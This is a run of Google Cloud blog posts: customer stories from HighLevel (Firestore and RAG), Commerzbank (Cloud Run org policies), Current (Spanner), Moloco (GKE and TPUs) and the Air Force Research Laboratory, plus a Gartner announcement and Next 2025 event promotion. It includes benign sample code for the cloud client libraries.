HighLevel is an all-in-one sales and marketing platform built for agencies. We empower businesses to streamline their operations with tools like CRM, marketing automation, appointment scheduling, funnel building, membership management, and more. But what truly sets HighLevel apart is our commitment to AI-powered solutions, helping our customers automate their businesses and achieve remarkable results.
As a software as a service (SaaS) platform experiencing rapid growth, we faced a critical challenge: managing a database that could handle volatile write loads. Our business often sees database writes surge from a few hundred requests per second (RPS) to several thousand within minutes. These sudden spikes caused performance issues with our previous cloud-based document database.
This previous solution required us to provision dedicated resources, which created several bottlenecks:
Slow release cycles: Provisioning resources before every release impacted our agility and time-to-market.
Scaling limitations: We constantly battled DiskOps limitations due to high write throughput and numerous indexes. This forced us to shard larger collections across clusters, requiring complex coordination and consuming valuable engineering time.
Going serverless with Firestore
To overcome these challenges, we sought a database solution that could seamlessly scale and handle our demanding write requirements.
Firestore’s serverless architecture made it a strong contender from the start. But it was the arrival of point-in-time recovery and scheduled backups that truly solidified our decision. These features eliminated our initial concerns and gave us the confidence to migrate the majority of HighLevel’s workloads to Firestore.
Since migrating to Firestore, we have seen significant benefits, including:
Increased developer productivity: Firestore’s simplicity has boosted our developer productivity by 55%, allowing us to focus on product innovation.
Enhanced scalability: We’ve scaled to over 30 billion documents without any manual intervention, handling workloads with spikes of up to 250,000 RPS and five million real-time queries.
Improved reliability: Firestore has proven exceptionally reliable, ensuring consistent performance even under peak load.
Real-time capabilities: Firestore’s real-time sync capabilities power our real-time dashboards without the need for complex socket infrastructure (see the listener sketch below).
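To illustrate the mechanism behind such dashboards, here is a minimal sketch of a Firestore snapshot listener using the google-cloud-firestore Python client. The project and collection names are hypothetical placeholders, not HighLevel’s actual schema.

```python
from google.cloud import firestore

db = firestore.Client(project="my-project")  # hypothetical project

def on_change(col_snapshot, changes, read_time):
    # Firestore invokes this callback whenever a matching document is
    # added, modified, or removed; no socket servers to run ourselves.
    for change in changes:
        print(change.type.name, change.document.id, change.document.to_dict())

# "dashboard_metrics" is a placeholder collection name.
watch = db.collection("dashboard_metrics").on_snapshot(on_change)

# ... later, stop listening:
# watch.unsubscribe()
```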
Firestore powering HighLevel’s AI
Firestore also plays a crucial role in enabling our AI-powered services across Conversation AI, Content AI, Voice AI and more. All these services are designed to put our customers’ businesses on autopilot.
Fig. 1: HighLevel AI features
For Conversation AI, for example, we use a retrieval augmented generation (RAG) architecture. This involves crawling and indexing customer data sources, generating embeddings, and storing them in Firestore, which acts as our vector database. This approach, sketched in code below, allows us to:
Overcome context window limitations of generative AI models
Reduce latency and cost
Improve response accuracy and minimize hallucinations
Fig. 2: HighLevel’s AI Architecture
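To make the retrieval step concrete, here is a minimal sketch of storing embeddings and running a nearest-neighbor query with Firestore’s vector search in the google-cloud-firestore Python client. The collection and field names are hypothetical, and `embed()` is a stand-in for whatever embedding model generates the vectors; this is not HighLevel’s actual pipeline.

```python
from google.cloud import firestore
from google.cloud.firestore_v1.vector import Vector
from google.cloud.firestore_v1.base_vector_query import DistanceMeasure

db = firestore.Client(project="my-project")  # hypothetical project
chunks = db.collection("kb_chunks")          # hypothetical collection

def embed(text: str) -> list[float]:
    # Placeholder: real code would call an embedding model (e.g., Vertex AI).
    return [0.0] * 768

# Index a crawled document chunk together with its embedding.
chunks.add({
    "text": "How do I reschedule an appointment?",
    "embedding": Vector(embed("How do I reschedule an appointment?")),
})

# Retrieve the top-5 most similar chunks for a user question.
# (Requires a Firestore vector index on the "embedding" field.)
results = chunks.find_nearest(
    vector_field="embedding",
    query_vector=Vector(embed("change my booking time")),
    distance_measure=DistanceMeasure.COSINE,
    limit=5,
).get()

# Concatenate retrieved text into the model prompt's context window.
context = "\n".join(doc.to_dict()["text"] for doc in results)
```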
Lessons learned and a path forward
Fig. 3: Google Firestore field indexes data
Our journey with Firestore has been eye-opening, and we’ve learned valuable lessons along the way.
For example, in December 2023, we encountered intermittent failures in collections with high write queries per second (QPS). These collections were experiencing write latencies of up to 60 seconds, causing operations to fail as deadlines expired before completion. With support from the Firestore team, we conducted a root-cause analysis and discovered that the issue stemmed from default single-field indexes on constantly increasing fields. These indexes, while helpful for single-field queries, were generating excessive writes on a specific sector of the index.
Once we understood the root cause, our team identified and excluded these unused indexes. This optimization resulted in a dramatic improvement, reducing write-tail latency from 60 seconds to just 15 seconds.
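For readers who hit a similar hotspot, the remedy is a single-field index exemption. Below is a minimal sketch using the Firestore Admin API Python client; the project, collection group, and field names are hypothetical placeholders, and monotonically increasing fields such as creation timestamps are the usual candidates.

```python
from google.cloud import firestore_admin_v1

admin = firestore_admin_v1.FirestoreAdminClient()

# Hypothetical names; the pattern targets a monotonically
# increasing field such as a creation timestamp.
field_name = (
    "projects/my-project/databases/(default)/"
    "collectionGroups/messages/fields/created_at"
)

# An empty index list removes the default single-field indexes for
# this field, eliminating the hot index shard on sequential writes.
operation = admin.update_field(
    request={
        "field": {
            "name": field_name,
            "index_config": {"indexes": []},
        }
    }
)
operation.result()  # wait for the long-running operation to finish
```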
Firestore has been instrumental in our ability to scale rapidly, enhance developer productivity, and deliver innovative AI-powered solutions. We are confident that Firestore will remain a cornerstone of our technology stack as we grow and evolve. Moving forward, we are excited to keep leveraging Firestore and Google Cloud to power our AI initiatives and deliver exceptional value to our customers.
Get started
Are you curious to learn more about how to use Firestore in your organization?
Watch our Next 2024 breakout session to discover recent Firestore updates, learn more about how HighLevel is experiencing significant total cost of ownership savings, and more!
This project has been a team effort. Shout out to the Platform Data team — Pragnesh Bhavsar in particular who has done an amazing job leading the team to ensure our data infrastructure runs at such a massive scale without hiccups. We also want to thank Varun Vairavan and Kiran Raparti for their key insights and guidance. For more from Karan Agarwal, follow him on LinkedIn.
Financial institutions routinely process millions of transactions daily, and when they run on cloud technology, any security lapse in their cloud infrastructure can have catastrophic consequences. For serverless compute workloads, many of these institutions rely on Cloud Run on Google Cloud. That’s why we are happy to announce the general availability of Google Cloud’s custom organization policies, which help fortify Cloud Run environments and allow them to be aligned seamlessly with regulatory standards ranging from the most lenient to the most stringent.
Financial services institutions operate under stringent global and local regulatory frameworks, with oversight from bodies such as the EU’s European Banking Authority, the US Securities and Exchange Commission, and the Monetary Authority of Singapore. The sensitive nature of financial data also necessitates robust security measures. Maintaining a comprehensive security posture is therefore of major importance, encompassing both coarse-grained and fine-grained controls to address internal and external threats.
Tailored Security, Configurable to Customers’ Needs
With custom org policies, organizations can define granular Cloud Run guardrails across several dimensions:
Network Access: Reduce unauthorized access attempts by precisely defining VPC configurations and ingress settings.
Deployment Security: Mandatory binary authorization can prevent potentially harmful deployments.
Resource Efficiency: Constraints on memory and CPU usage help teams get the most out of their cloud resources.
Stability & Consistency: Limiting the use of Cloud Run features to those in general availability (GA) and enforcing standardized naming conventions enables a predictable, manageable environment.
This level of customization enables building a Cloud Run environment that’s not just secure, but also perfectly aligned with unique operational requirements. The sketch below illustrates what one such guardrail can look like.
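As an illustration, the following sketch creates a custom constraint that only allows Cloud Run services with binary authorization enabled. It assumes the google-cloud-org-policy Python client exposes the custom-constraint RPCs; the organization ID is a placeholder and the CEL condition is illustrative, so consult the Cloud Run custom-constraint schema for the exact resource field paths.

```python
from google.cloud import orgpolicy_v2

client = orgpolicy_v2.OrgPolicyClient()

# Organization ID and the CEL condition below are illustrative;
# real conditions must reference the Cloud Run resource schema.
constraint = orgpolicy_v2.CustomConstraint(
    name="organizations/123456789/customConstraints/custom.runRequireBinAuthz",
    resource_types=["run.googleapis.com/Service"],
    method_types=[
        orgpolicy_v2.CustomConstraint.MethodType.CREATE,
        orgpolicy_v2.CustomConstraint.MethodType.UPDATE,
    ],
    condition="resource.binaryAuthorization.useDefault == true",
    action_type=orgpolicy_v2.CustomConstraint.ActionType.ALLOW,
    display_name="Require Binary Authorization on Cloud Run services",
)

client.create_custom_constraint(
    parent="organizations/123456789",
    custom_constraint=constraint,
)
```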
Addressing the Complexities of Commerzbank’s Cloud Run Setup
Within Commerzbank’s Big Data & Advanced Analytics division, the company leverages cloud technology for its inherent benefits, particularly serverless services. Cloud Run is a crucial component of this serverless architecture and stretches across many applications due to its flexibility. While Cloud Run already offered security features such as VPC Service Controls, multi-regionality, and CMEK support, granular control over all of Cloud Run’s capabilities was initially limited.
Diagram illustrating simplified policy management with Custom Org Policies
Better Together
The introduction of Custom Org Policies for Cloud Run now allows Commerzbank to directly map its rigorous security controls, ensuring compliant use of the service. This enhanced control enables the full-scale adoption and scalability of Cloud Run to support our business needs.
The granular control made possible by Custom Org Policies has been a game-changer. Commerzbank and customers like it can now tailor their security policies to their exact needs, preventing potential breaches and ensuring regulatory compliance.
A Secure Foundation for Innovation
Custom Org Policies have become an indispensable part of the cloud security toolkit. Their ability to enforce granular, tailored controls has boosted Commerzbank’s Cloud Run security and compliance. This newfound confidence allows them to innovate with agility, knowing their cloud infrastructure is locked down.
If you’re looking to enhance your Cloud Run security and compliance, we highly recommend exploring Custom Org Policies. They’ve been instrumental in Commerzbank’s journey, and we’re confident they can benefit your organization, too.
Looking Ahead: We’re also eager to explore how to leverage custom org policies for other Google Cloud services as Commerzbank continues to expand its cloud footprint. The bank’s commitment to security and compliance is unwavering, and custom org policies will remain a cornerstone of Commerzbank’s strategy.
We’re excited to share that Gartner has recognized Google as a Leader in the 2024 Gartner® Magic Quadrant™ for Data Integration Tools. As a Leader in this report, we believe Google’s position is a testament to delivering continuous customer innovation in areas such as unified data to AI governance, flexible and accessible data engineering experiences, and AI-powered data integration capabilities.
Today, most organizations operate with just 10% of the data they generate, which is often trapped in silos and disconnected legacy systems. The rise of AI unlocks the potential of the remaining 90%, enabling you to unify this data — regardless of format — within a single platform.
This convergence is driving a profound shift in how data teams approach data integration. Traditionally, data integration was seen as a separate IT process solely for enterprise business intelligence. But with the increased adoption of the cloud, we’re witnessing a move away from legacy on-premises technologies and towards a more unified approach that enables various users to access and work with a more robust set of data sources.
At the same time, organizations are no longer content with simply collecting data; they need to analyze it and activate it in real-time to gain a competitive edge. This is why leading enterprises are either migrating to or building their next-gen data platforms with BigQuery, converging the world of data lakes and warehouses. BigQuery’s unified data and AI capabilities combined with Google Cloud’s comprehensive suite of fully managed services, empower organizations to ingest, process, transform, orchestrate, analyze, and activate their data with unprecedented speed and efficiency. This end-to-end vision delivers on the promise of data transformation, so businesses can unlock the full value of their data and drive innovation.
Choice and flexibility to meet you where you are
Organizations thrive on data-driven decisions, but often struggle to wrangle information scattered across various sources. Google Cloud tools simplify data integration by letting you:
Streamline data integration from third-party applications – With BigQuery Data Transfer Service, onboarding data from third-party applications like Salesforce or Marketo becomes dramatically simpler, eliminating complex coding and saving valuable time and data movement costs (see the sketch after this list).
Create SQL-based pipelines – Dataform helps create robust, SQL-based pipelines, orchestrating the entire data integration flow easily and scalably. This flexibility empowers organizations to connect all their data dots, wherever they are, so they can unlock valuable insights faster.
Use gen-AI powered data preparation – BigQuery data preparation empowers analysts to clean and prepare data directly within BigQuery, using Gemini’s AI for intelligent transformations to streamline processes and help ensure data quality.
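As a concrete example of the Data Transfer Service mechanics, the sketch below schedules a recurring transfer with the BigQuery Data Transfer Python client. It uses the scheduled-query data source because its parameters are simple; SaaS connectors such as Salesforce follow the same pattern but take their own `data_source_id` and connector-specific `params`. The project, dataset, and query are placeholders.

```python
from google.cloud import bigquery_datatransfer_v1 as dts

client = dts.DataTransferServiceClient()
parent = "projects/my-project/locations/us"  # placeholder project/region

config = dts.TransferConfig(
    display_name="nightly-marketing-load",
    destination_dataset_id="marketing",   # placeholder dataset
    data_source_id="scheduled_query",     # SaaS connectors use their own ids
    params={
        "query": "SELECT CURRENT_DATE() AS load_date",
        "destination_table_name_template": "daily_load_{run_date}",
        "write_disposition": "WRITE_TRUNCATE",
    },
    schedule="every 24 hours",
)

created = client.create_transfer_config(parent=parent, transfer_config=config)
print("Created transfer:", created.name)
```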
Bridging operational and analytical systems
Data teams know how frustrating it can be to have valuable analytical insights trapped in a data warehouse, disconnected from the operational systems where they could make a real impact. You don’t want to get bogged down in the complexities of ELT vs. ETL vs. ETL-T — you need solutions that prioritize SLAs to ensure on-time and consistent data delivery. This means having the right connectors to meet your needs, especially with the growing importance of real-time data. Google Cloud offers a powerful suite of integrated tools to bridge this gap, helping you easily connect your analytical insights with your operational systems to drive real-time action. With Google Cloud’s data tools, you can:
Perform advanced similarity searches and AI-powered analysis – Vector support across BigQuery and all Google databases lets you perform advanced similarity searches and AI-powered analysis directly on operational data (a sketch follows this list).
Query operational data without moving it – Data Boost enables analysts to query data in place across sources like Bigtable and Vertex AI, while BigQuery’s continuous queries facilitate reverse ETL, pushing updated insights back into operational systems.
Implement real-time data integration and change data capture – Datastream captures changes and delivers them with low latency. Dataflow, Google Managed Service for Kafka, Pub/Sub, and new support for Apache Flink further enhance the reverse ETL process, fueling operational systems with fresh, actionable insights derived from analytics, all while using popular open-source software.
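To illustrate the vector capability on the BigQuery side, here is a minimal similarity search using the `VECTOR_SEARCH` table function through the BigQuery Python client. The dataset, table, and three-dimensional toy vector are placeholders; production embeddings would have hundreds of dimensions and typically a vector index over the searched column.

```python
from google.cloud import bigquery

client = bigquery.Client(project="my-project")  # placeholder project

sql = """
SELECT base.id, base.content, distance
FROM VECTOR_SEARCH(
  TABLE `my-project.catalog.embeddings`,      -- placeholder table
  'embedding',
  (SELECT [0.12, 0.03, 0.98] AS embedding),   -- toy 3-dim query vector
  top_k => 5,
  distance_type => 'COSINE'
)
ORDER BY distance
"""

# Iterating the query job waits for and streams the result rows.
for row in client.query(sql):
    print(row.id, row.content, row.distance)
```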
Governance at the heart of a unified data platform
Having strong data governance is critical, not just a checkbox item. It’s the foundation of ensuring your data is high-quality, secure, and compliant with regulations. Without it, you risk costly errors, security breaches, and a lack of trust in the insights you generate. BigQuery treats governance as a core component, not an afterthought, with a range of built-in features that simplify and automate the process, so you can focus on what matters most — extracting value from your data.
Easily search, curate and understand data with accelerated data exploration – With BigQuery data insights powered by Gemini, users can easily search, curate, and understand the data landscape, including the lineage and context of data assets. This intelligent discovery process helps remove the guesswork and accelerates data exploration.
Automatically capture and manage metadata – BigQuery’s automated data cataloging capabilities automatically capture and manage metadata, minimizing manual harvesting and helping to ensure consistency.
Google Cloud’s infrastructure is purpose-built with AI in mind, allowing users to easily leverage generative AI capabilities at scale. Users can train models, generate vector embeddings and indexes, and deploy data and AI use cases without leaving the platform. AI is infused throughout the user journey, with features like Gemini-assisted natural language processing, secure model integration, AI-augmented data exploration, and AI-assisted data migrations. This AI-centric approach delivers a strong user experience for data practitioners with varying skill sets and expertise.
2024 Gartner Magic Quadrant for Data Integration Tools, Thornton Craig et al., December 3, 2024. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Google. GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and MAGIC QUADRANT is a registered trademark of Gartner, Inc. and/or its affiliates and are used herein with permission. All rights reserved.
Editor’s note: In the heart of the fintech revolution, Current is on a mission to transform the financial landscape for millions of Americans living paycheck to paycheck. Founded on the belief that everyone deserves access to modern financial tools, Current is redefining what it means to be a financial institution in the digital age. Central to their success is a cloud-native infrastructure built on Google Cloud, with Spanner, Google’s globally distributed database with virtually unlimited scale, serving as the bedrock of their core platform.
More than 100 million Americans struggle to make ends meet, including the 23% of low-income Americans the Federal Reserve estimates do not have a bank account. Current was created to address their needs with a unique business model focused on payments, rather than the deposits and withdrawals of traditional financial institutions. We offer an easily accessible experience designed to make financial services available to all Americans, regardless of age or income.
Our innovative approach — built on proprietary banking core technology with minimal reliance on third-party providers — enables us to rapidly deploy financial solutions tailored to our members’ immediate needs. More importantly, these solutions are flexible enough to evolve alongside them in the future.
In our mission to deliver an exceptional experience, one of the biggest challenges we faced was creating a scalable and robust technological foundation for our financial services. To address this, we developed a modern core banking system to power our platform. Central to this core is our user graph service, which manages all member entities — such as users, products, wallets, and gateways.
Many unbanked and disadvantaged Americans lack bank accounts due to a lack of trust in institutions as much as because of any lack of funds. If we were going to win their trust and business, we knew we had to have a secure, seamless, and reliable service.
A cloud-native core with Spanner
Our previous self-hosted graph database solution lacked cloud-native capabilities and horizontal scalability. To address these limitations, we strategically transitioned to managed persistence layers, which significantly improved our risk posture. Features like point-in-time restore and multi-regional redundancy enhanced our resilience, reduced our recovery time objective (RTO), and improved our recovery point objective (RPO). Additionally, push-button scaling optimized our cloud budget and operational efficiency.
This cloud-native platform necessitated a database solution with consistent writes, horizontal scalability, low read latency under load, and multi-region failover. Given our extensive use of Google Cloud, we prioritized its database offerings. Spanner emerged as the ideal solution, fulfilling all our requirements. It offers consistent writes, horizontal scalability, and the ability to maintain low read latency even under heavy load. Its seamless scalability — particularly the decoupling of compute and storage resources — proved invaluable in adapting to our dynamic consumer environment.
This robust and scalable infrastructure empowers Current to deliver reliable and efficient financial services, critical for building and maintaining member trust. We are the primary financial relationship for millions of Americans who are trusting us with their money week after week. Our experience migrating from a third-party database to Spanner proved that transitioning to a globally scalable, highly available database can be easy and seamless. Spanner’s unique ability to scale compute and storage independently proved invaluable in managing our dynamic user base.
Our strategic migration to Spanner employed a write-ahead commit log to ensure a seamless transition. By prioritizing the migration of reads and verifying their accuracy before shifting writes, we minimized risk and maximized efficiency. This process resulted in a zero-downtime, zero-loss cutover, where we could first transition reads to Spanner on a service-by-service basis, confirm accuracy, and finally migrate writes.
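The read-verification step can be pictured with a small sketch: serve from the legacy store while comparing each result against Spanner, and flip the primary only once mismatches stop. This is illustrative pseudocode with hypothetical client wrappers, not Current’s actual commit-log implementation.

```python
import logging

log = logging.getLogger("spanner_migration")

def shadow_read(user_id, legacy_db, spanner_db, serve_from_spanner=False):
    """Dual-read during migration (illustrative; clients are hypothetical).

    Writes still flow to the legacy store (plus the commit log); reads
    are compared so accuracy can be confirmed service by service before
    the write path is cut over.
    """
    legacy = legacy_db.get_user(user_id)
    shadow = None
    try:
        shadow = spanner_db.get_user(user_id)
        if shadow != legacy:
            log.warning("read mismatch for user %s", user_id)
    except Exception:
        log.exception("Spanner shadow read failed for user %s", user_id)

    # Flip the flag once the mismatch rate for this service reaches zero.
    return shadow if serve_from_spanner and shadow is not None else legacy
```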
Ultimately, our Spanner-powered user graph service delivered the consistency, reliability, and scalability essential for our financial platform. We had renewed confidence in our ability to serve our millions of customers with reliable service and new abilities to scale our existing services and future offerings.
Unwavering Reliability and Enhanced Operational Efficiency
Spanner has dramatically improved our resilience, reducing RTO and RPO by more than 10x, cutting times to just one hour. With Spanner’s streamlined data restoration process, we can now recover data with a few simple clicks. Offloading operational management has also significantly decreased our team’s maintenance burden. With nearly 5,000 transactions per second, we continue to be impressed by Spanner’s performance and scalability.
Additionally, since migrating to Spanner, we have reduced our availability-related incidents to zero. Such incidents could disrupt essential banking functions like accessing funds or making payments, leading to customer dissatisfaction and potential churn, as well as increased operational costs for issue resolution. Elimination of these occurrences is critical for building and maintaining member trust, enhancing retention, and improving the developer experience.
Building Financial Resilience with Google Cloud
Looking ahead, we envision a future where our platform continues to evolve, delivering innovative financial solutions that meet the ever-changing needs of our members. With Spanner as the foundation of our core platform — you could call it the core of cores — we are confident in building a resilient and reliable platform that enables millions more Americans to improve their financial outcomes.
In today’s congested digital landscape, businesses of all sizes face the challenge of optimizing their marketing budgets. They must find ways to stand out amid the bombardment of messages vying for potential customers’ attention. Moreover, they grapple with rising customer acquisition costs and dwindling retention rates, impeding their profitability.
Adding to this complexity is the abundance of consumer data, which businesses often struggle to harness effectively to target the right audience. To address these challenges, companies are seeking data-driven approaches to enhance their advertising effectiveness, to help ensure their continued relevance and profitability.
Moloco offers AI-powered advertising solutions that drive user acquisition, retention, and monetization efforts. Moloco Ads, its demand-side platform (DSP), utilizes its customers’ unique first-party data, helping them to target and acquire high-value users based on real-time consumer behavior — ultimately, delivering higher conversion rates and return on investment.
To meet this demand, Moloco leverages predictions from a dozen deep neural networks, while continuously designing and evaluating new models. The platform ingests 10 petabytes of data per day and processes bid requests at a peak rate of 10.5 million queries per second (QPS).
Moloco has seen tremendous growth over the last three years, with its business growing over 8X and multiple customers spending more than $50 million annually. Moloco’s rapid growth required an infrastructure that could handle massive data processing and real-time ML predictions while remaining cost effective. As Moloco’s models grew in complexity, training times increased, hindering productivity and innovation. Separately, the Moloco team realized that they also needed to optimize serving efficiency to scale low-latency ad experiences for users across the globe.
Training complex ML models with GKE
After evaluating multiple cloud providers and their solutions, Moloco opted for Google Cloud for its scalability, flexibility, and robust partner ecosystem. The infrastructure provided by Google Cloud aligned with Moloco’s requirements for handling its rapidly growing data and machine learning workloads that are instrumental to optimizing customers’ advertising performance.
Google Kubernetes Engine (GKE) was a primary reason for Moloco selecting Google Cloud over other cloud providers. As Moloco discovered, GKE is more than a container orchestration tool; it’s a gateway to harnessing the full potential of AI and ML. GKE provides scalability and performance optimization tools to meet diverse ML workloads, and supports a wide range of frameworks, allowing Moloco to customize the platform according to their specific needs.
GKE serves as a foundation for a unified AI/ML platform, integrating with other Google Cloud services, facilitating a robust environment for the data processing and distributed computing that underpin Moloco’s complex AI and ML tasks. GKE’s ML data layer offers the high-throughput storage solutions that are crucial for read-heavy workloads. Features like cluster autoscaler, node-auto provisioner, and pod autoscalers ensure efficient resource allocation.
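As one concrete knob among those features, the sketch below enables node pool autoscaling through the GKE Python client. The cluster, node pool, and scaling bounds are placeholders, and this shows only one of the autoscaling layers; Horizontal Pod Autoscalers and node auto-provisioning are configured separately.

```python
from google.cloud import container_v1

client = container_v1.ClusterManagerClient()

# Placeholder project, location, cluster, and node pool names.
name = (
    "projects/my-project/locations/us-central1/"
    "clusters/serving-cluster/nodePools/model-pool"
)

operation = client.set_node_pool_autoscaling(
    request={
        "name": name,
        "autoscaling": container_v1.NodePoolAutoscaling(
            enabled=True,
            min_node_count=0,   # scale to zero when idle
            max_node_count=16,  # cap spend under burst load
        ),
    }
)
print("Operation:", operation.name)
```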
“Scaling our infrastructure as Moloco’s Ads business grew exponentially was a huge challenge. GKE’s autoscaling capabilities enabled the engineering team to focus on development without spending a ton of effort on operations.” – Sechan Oh, Director of Machine Learning, Moloco
Shortly after migrating to Google Cloud, Moloco began using GKE for model training. However, Moloco quickly found that using traditional CPUs was not competitive at its scale, in terms of both cost and velocity. GKE’s ability to autoscale on multi-host Tensor Processing Units (TPUs), Google’s specialized processing units for machine learning workloads, was critical to Moloco’s success, allowing Moloco to harness TPUs at scale, resulting in significant enhancements in training speed and efficiency.
Moloco further leveraged GKE’s AI and ML capabilities to optimize the management of its compute resources, minimizing idle time and generating cost savings while improving performance. Notably, GKE empowered Moloco to scale its ML infrastructure to accommodate exponential business growth without straining its engineering team. This enabled Moloco’s engineers to concentrate on developing AI and ML software instead of managing infrastructure.
“The GKE team collaborated closely with us to enable autoscaling for multi-host TPUs, which is a recently added feature. Their help has really enabled amazing performance on TPUs, reducing our cost per training job by 2-4 times.” – Kunal Kukreja, Senior Machine Learning Engineer, Moloco
In addition to training models on TPUs, Moloco also uses GPUs on GKE to deploy ML models into production. This lets the Moloco platform handle real-time inference requests effectively and benefit from GKE’s scalability and operational stability, enhancing performance and supporting more complex models.
Moloco collaborated closely with the Google Cloud team throughout the implementation process, leveraging their expertise and guidance. The Google Cloud team supported Moloco in implementing solutions that ensured a smooth transition and minimal disruption to operations. Specifically, Moloco worked with the Google Cloud team to migrate its ML workloads to GKE using the platform’s autoscaling and pod prioritization capabilities to optimize resource utilization and cost efficiency. Additionally, Moloco integrated Cloud TPUs into its training pipeline, resulting in significantly reduced training times for complex ML models. Furthermore, Moloco optimized its serving infrastructure with GPUs, ensuring low-latency ad experiences for its customers.
A powerful foundation for ML training and inference
Moloco’s collaboration with Google Cloud profoundly transformed its capacity for innovation.
“By harnessing Google Cloud’s solutions, such as GKE and Cloud TPU, Moloco dramatically reduced ML training times by up to tenfold.” – Sechan Oh, Director of Machine Learning, Moloco
This in turn facilitated swift model iteration and experimentation, empowering Moloco’s engineers to innovate with unprecedented speed and efficiency. Moreover, the scalability and performance of Google Cloud’s infrastructure enabled Moloco to manage increasingly intricate models and expansive datasets, to create and implement cutting-edge machine learning solutions. Notably, Moloco’s low-latency advertising experiences, bolstered by GPUs, fostered enhanced customer satisfaction and retention.
Moloco’s success demonstrates the power of Google Cloud’s solutions to help businesses achieve their full potential. By leveraging GKE, Cloud TPU, and GPUs, Moloco was able to scale its infrastructure, accelerate its ML training, and deliver exceptional ad experiences to its customers. As Moloco continues to grow and innovate, Google Cloud will remain a critical partner in its success.
Meanwhile, GKE is transforming the AI and ML landscape by offering a blend of scalability, flexibility, cost-efficiency, and performance. And Google Cloud continues to invest in GKE so it can handle even the most demanding AI training workloads. For example, GKE now supports 65,000-node clusters, offering unmatched scale for training or inference. For more, watch this demo of 65,000 nodes on a single GKE cluster.
Based on your feedback, Partner Summit 2025 will begin on Tuesday, April 8 – one day before Google Cloud Next kicks off – to offer a dedicated day of partner breakout sessions and learning opportunities before the main event begins. The Partner Summit Lounge, partner keynote, lightning talks, and more will all be available April 9–11, 2025.
Partner Summit is your exclusive opportunity to:
Accelerate your business by aligning on joint business goals, learning about new programmatic and incentive opportunities, and diving deep into cutting-edge insights in our Partner Summit breakout sessions and lightning talks.
Build new connections as you network with other partners and Googlers while you explore the activities and perks located in our exclusive Partner Summit Lounge.
Get a look at what’s next from Google Cloud leadership at the dedicated partner keynote to learn about where cloud is headed – and how our partners are central to our mission.
Make the most of our partnership with personalized advice from Google Cloud team members on incentives, certifications, co-marketing, and more at our Meet the Experts booths.
Get ready to learn, connect, and build the future of business with us. Early bird registration is now open for $999. This special rate is only available through February 14, 2025, or until tickets are sold out.
Google Cloud Next returns to Las Vegas, April 9–11, 2025*, and I’m thrilled to share that registration is now live! We welcomed 30,000 attendees to our largest flagship conference in Google Cloud history this past April, and 2025 will be even bigger and better than ever.
Join us for an unforgettable week of hands-on experiences, inspiring content, and problem-solving with our top partners, and seize the opportunity to learn from top experts and peers tackling the same challenges you do, day in and day out. Walk away with new ideas, breakthrough skills, and actionable knowledge only available at Google Cloud Next 2025.
Early bird registration is now available for just $999 for a limited time**.
Here’s why you need to be at Next:
Experience AI in Action: Immerse yourself in the latest technology; build your next agent; explore our demos, hackathons, and workshops; and learn how others are harnessing the power of AI to propel their businesses to new heights.
Forge Powerful Connections: Network with peers, industry experts, and the brightest minds in tech to exchange ideas, spark collaborations, and shape the future of your industry.
Build and Learn Live: With a wealth of demos and workshops, hackathons, keynotes, and deep dives, Next is the place to be for the builders, dreamers, and doers shaping the future of technology.
* Select programming to take place in the afternoon of April 8. ** Space is limited, and this offer is only valid through 11:59 PM PT on February 14, 2025, or until tickets are sold out.
Through our collaboration, the Air Force Research Laboratory (AFRL) is leveraging Google Cloud’s cutting-edge artificial intelligence (AI) and machine learning (ML) capabilities to tackle complex challenges across various domains, from materials science and bioinformatics to human performance optimization. AFRL, the center for scientific research and development for the U.S. Air Force and Space Force, is embracing the transformative power of AI and cloud computing to accelerate its mission of developing and transitioning advanced technologies to the air, space, and cyberspace forces.
This collaboration not only enhances AFRL’s research capabilities, but also aligns with broader Department of Defense (DoD) initiatives to integrate AI into critical operations, bolster national security, and maintain technological advantage by demonstrating game-changing technologies that enable technical superiority and help the Air Force adopt cutting-edge technologies as soon as they are released. By harnessing Google Cloud’s scalable infrastructure, comprehensive generative AI offerings, and collaborative environment, the AFRL is driving innovation and ensuring the U.S. Air Force and Space Force remain at the forefront of technological advancement.
Let’s delve into examples of how the AFRL and Google Cloud are collaborating to realize the benefits of AI and cloud services:
Bioinformatics breakthroughs: The AFRL’s bioinformatics research was once hindered by time-consuming manual processes and data bottlenecks, causing delays in moving and sharing data, getting access to US-based tools, using standard storage and hardware, and establishing the right system communications and integrations across third-party infrastructure. Because of this, cross-team collaboration and experiment expansion were severely limited and inefficiently tracked. With very little cloud experience, the team was able to create a siloed environment where they used Google Cloud’s infrastructure, such as Google Compute Engine, Cloud Workstations, and Cloud Run, to build analytic pipelines that helped them test, store, and analyze data in an automated and streamlined way. That data pipeline automation paved the way for further exploration and expansion on a use case that had never been done before.
Web app efficiency for lab management: The AFRL’s complex lab equipment scheduling process made it challenging to provide scalable, secure access to important content and information for users in different labs. To mitigate these challenges and ease maintenance for non-programmer researchers and lab staff, the team built a custom web application based on Google App Engine, integrated with Google Workspace and Apps Script, so that they could capture usage metrics for future hardware investment decisions and automate admin tasks that were taking time away from research. The result was a significantly faster ability to make changes without administrator intervention, a variety of self-service options for users to schedule time on equipment and request training, and an enhanced, scalable design architecture with built-in SSO that helped streamline internal content for multiple labs.
Modeling insights into human performance: Understanding and optimizing human performance is critical for the AFRL’s mission. The FOCUS Mission Readiness App, built on Google Cloud, utilizes infrastructure services such as Cloud Run, Cloud SQL, and GKE, and integrates with the Garmin Connect APIs to collect and analyze real-time data from wearables.
By leveraging Google Cloud’s BigQuery and other analytics tools, this app provides personalized insights and recommendations for fatigue interventions and predictions that help capture valuable improvement mechanisms in cognitive effectiveness and overall well-being for Airmen.
Streamlined AI model development with Vertex AI: The AFRL wanted to replicate the functionality of university HPC clusters, especially since a diverse set of users needed extra compute and not everyone was trained on how to use these tools. They wanted an easy GUI and the ability to maintain active connections where they could develop AI models and test their research with confidence. They leveraged Google Cloud’s Vertex AI and Jupyter notebooks through Workbench, along with Compute Engine, Cloud Shell, Cloud Build, and much more, to get a head start in creating a pipeline for sharing, ingesting, and cleaning their code. Having access to these resources helped create a flexible environment for researchers to develop and test models in an accelerated manner.
